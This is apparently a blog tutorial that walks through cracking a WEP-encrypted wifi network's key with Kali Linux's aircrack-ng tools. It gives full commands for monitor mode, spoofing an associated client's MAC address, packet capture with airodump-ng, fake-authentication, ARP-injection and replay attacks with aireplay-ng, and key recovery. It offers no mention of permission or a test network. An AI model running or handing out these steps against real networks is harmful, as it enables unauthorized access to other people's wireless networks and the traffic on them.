Today, we commonly find wireless networks around us. Most wireless
networks are encrypted using WEP or WPA encryption methods. In a
previous post dictionary attack on WPA networks. In this post, I'll cover WEP which has weak mechanism, thus easy to crack, compared to WPA and WPA2.
Theory
WEP, short for wired equivalent privacy, is one of several encryption schemes used to secure wireless networks. At the time of conception, WEP was believed to be secure. However, a security flaw was found in the IV headers of data packets that makes it possible to crack WEP if enough IV headers are collected. The attacks shown in this tutorial take advantage of this weakness in the initialization vectors of wireless packets to crack WEP.When enough packets have been collected, the key for the WEP-secured network can be cracked by using wifi-hacking tools, such as aircrack-ng. Kali Linux includes aircrack-ng among one of its top 10 security tools for testing vulnerability of computer networks. In this post, I'll demonstrate how a WEP key can be easily found using the aircrack-ng tools in Kali Linux. However, a problem may arise when there are multiple keys in use instead of just one.
What You Need To Follow The Steps In This Tutorial
You need Kali Linux and basic knowledge of Linux. Kali Linux is a Debian-based Linux distribution for testing network security. Kali Linux currently supports PC's and ARM-powered machines. If you use a PC, download the Kali Linux ISO and burn it to a black DVD with InfraRecorder or another tool.Then, boot your computer with the Kali Linux DVD. Hopefully, you'll be automatically presented with a nice and dark GUI screen of GNOME desktop. For information on running Kali on ARM hardware, see this page.
Let's Crack WEP
- Open the GNOME Terminal (the square icon with >_) and type the
command for loading a driver for your wireless network card or USB WiFi
adapter. You may have to put required firmware in /lib/firmware before
trying to load the driver because Kali Linux lacks firmware for some
drivers. For example, to load b43 driver, type:
modprobe -r b43 modprobe b43
If the WiFi driver is working, then the network traffic in the top right corner of the screen will show available wireless networks when you click on it.
- Use kismet to find information about the WEP-secured wireless network that you want to crack. This post shows you how. You need such information as:
- Name of the wireless network (ESSID)
- MAC address of the access point (BSSID)
- Channel of the wireless network
- MAC address of wireless clients
In Kismet, WEP-secured networks are marked with W under the C column of network list.
- Type the following commands to put your wireless device wlan0 in monitoring mode.
airmon-ng stop wlan0 airmon-ng start wlan0
- Change the MAC address of your wireless network card. This
may or may not work depending on the hardware used. In the example, the
text in red is the new MAC address for
your wireless card. Usually, this MAC is the actual MAC address of an
existing wireless client associated with the target network. With the
fake MAC, we're going to trick the access point with one of the
following attacks.
ifconfig wlan0 down ifconfig wlan0 hw ether 6C:83:36:6C:65:CD ifconfig -a - Start airodump-ng which will sniff wireless traffic of the
target network and collect good IV's (initialization vectors, part of
WEP encryption data). The logfile will be used later to find the WEP
key. The number after -c option is the channel
of the wireless network to listen to. The screen will show wireless
networks and associated clients, if any, with a set of numbers
increasing. Don't stop airodump-ng or close the terminal yet. Just leave
the terminal open.
airodump-ng -w logfile -c 6 --ivs wlan0 - In the following attacks, we are going to use aireplay-ng.
Aireplay-ng is a handy tool for generating more wireless traffic in
order to collect sufficient amount of good IV's. It does so by injecting
or replaying captured packets to fool the access point into giving us
what we need. Open another tab in GNOME Terminal. This attack will
associate the target wireless client with the access point.
aireplay-ng -1 30 -e WIFINET -a 00:23:97:26:66:A3 -h 6C:83:36:6C:65:CD wlan0
The -e option specifies the network name, the -a option specifies the MAC address of the AP, and the -h option specifies the MAC address of the wireless client. You can use macchanger to view and change your MAC address, for example,macchanger -s wlan0. Then, you can associate your wireless adapter when there are no clients connected to the wireless network in the first place.
- ARP injection is slow but always works. While airodump-ng is
listening, open another tab in GNOME Terminal and start the ARP
injection attack.
aireplay-ng -3 -b 00:23:97:26:66:A3 -h 6C:83:36:6C:65:CD wlan0
The -b option specifies the MAC address of the AP and -h specifies MAC address of the associated client. Let it run and airodump-ng will pick up traffic. If no client is connected, we can create one by fake authentication described above.
- This attack generates traffic by asking the access point to
resend data packets. Open another tab in GNOME Terminal and start the
interactive packet replay attack.
aireplay-ng -2 -b 00:23:97:26:66:A3 -h 6C:83:36:6C:65:CD -n 160 -p 0841 -c FF:FF:FF:FF:FF:FF wlan0
The -b option specifies the MAC address of the AP and -h specifies MAC address of the associated client.
- After enough packets have been collected and saved, aircrack-ng can be used to crack the WEP key.
aircrack-ng -a 1 -b 00:23:97:26:66:A3 -n 64 logfile-01.ivsReplace the filename with your log file that was previously generated with airodump-ng. Also, specify the access point's MAC address with -b option. The -n option specifies whether the WEP strength is 64-bit or 128-bit. The -a 1 option specifies that we're cracking WEP.
If you still can't crack WEP with tons of IV's, increase the fudge factor with -f N option (N>=2). It'll take much longer to crack but you'll have a better chance at success.
0 comments:
Post a Comment